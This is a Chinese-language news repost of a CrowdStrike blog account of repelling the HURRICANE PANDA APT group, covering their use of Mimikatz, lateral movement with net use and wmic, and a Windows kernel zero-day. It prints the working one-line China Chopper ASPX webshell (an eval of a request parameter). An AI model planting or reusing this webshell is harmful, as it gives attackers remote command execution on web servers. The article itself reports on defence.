CrowdStrike:我们挡住了中国黑客组织飓风熊猫

  • A+
所属分类:业界关注

CrowdStrike:我们挡住了中国黑客组织飓风熊猫

通常我们看到黑客入侵事件的报道大多为:某公司被黑客入侵了,检测到一未知行为,事件响应小组已介入调查和处理,客户和公众确定入侵行为结束,公司解除安全警报……你是不是也这样认为黑客入侵都是偶发性、短暂性的呢?

而APT(高级可持续性威胁)攻击并不是这样——真正有目的性的攻击者并不会考虑战斗或者使命什么时候结束,直至被发现或被踢出网络的那一刻才算暂时中止。他们的工作就是入侵到某网站,然后潜伏在其中。这其中的艰苦和所面对的困难只有他们自己知道,他们通常会连续工作几周甚至几个月,直至成功入侵。当然功夫不负有心人,大多数情况下都能成功。成功入侵之后,他们便会继续他们的主要工作,窃取敏感数据、使受害者宕机等。

论持久战

成功入侵的心诀就是持之以恒。攻击者需要做好长久作战的准备,要知道攻击目标都不是傻子,他们可能很快就发现了你的攻击行为,并给予了还击,这个时候你就要另辟蹊径,重新寻找攻击突破口了。有时一次成功的入侵会循环往复好多次重复操作。

还有一种比较高效的还击方法——损毁攻击者的间谍情报技术和工具,这样既阻碍了入侵,还浪费了攻击者大量的时间和精力,一石二鸟有没有?

好了,废话有点多,该进入正题了……

背景

CrowdStrike:我们挡住了中国黑客组织飓风熊猫

CrowdStrike公司官方博客上发表了一篇文章,宣称成功阻挡住了中国黑客组织飓风熊猫(HURRICANE PANDA)的网络攻击。CrowdStrike从2013年就开始调查飓风熊猫,并一直在与之斗争。

CrowdStrike对飓风熊猫的攻击决心给出了如下评价:

they are like a dog with a bone.(小编愚昧,比喻太过深奥,还是不翻为好……)

与飓风熊猫之间的攻防战

2014年4月底,一家遭到飓风熊猫攻击的公司向CrowdStrike公司寻求了帮助。CrowdStrike建议它立即在主机基础设施上部署他们的端点安全技术CrowdStrike Falcon。该技术可以让他们清楚的看到攻击者的行为:执行的命令、窃取的证书等,这样就大大节约了寻找修复方法的时间。所以这家公司在6月初的时候就完全修复了被攻击者利用的所有漏洞,也就是说飓风熊猫被成功踢了出去。

然而HURRICANE PANDA的战斗并没有终止……

随之而来的是,重新发起攻击的飓风熊猫选择使用China Chopper webshell(中国菜刀)——它是一个微小、易被忽略且只有70字节的文本文件,里面包含一个‘eval()’命令,会为攻击者提供完整的命令执行权限和文件上传/下载能力。该脚本可以通过SQL注入或者WebDAV 漏洞上传至web服务器。

<%@Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe"); %>

一旦该脚本成功植入进受害者web服务器,攻击者会立即启动证书窃取工具(如 Mimikatz)。如果攻击者足够幸运,恰好在管理员登录web服务器的时候发动攻击的话,便可窃取到域名管理员证书,然后在webshell 终端执行‘net use’和‘wmic’命令,之后便可畅游受害者网络了。

而CrowdStrike很快检测并阻止了木马后门China Chopper webshell。

在为期4个月的尝试无果之后,飓风熊猫再次提升了他们的间谍情报技术并利用了Windows内核0day漏洞 (CVE-2014-4113),而且即便借助于0day漏洞也没能绝地反击,经过无数次攻击尝试失败后,HURRICANE PANDA终于放弃了。

CrowdStrike:我们挡住了中国黑客组织飓风熊猫

* 参考来源blog.crowdstrike.com

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: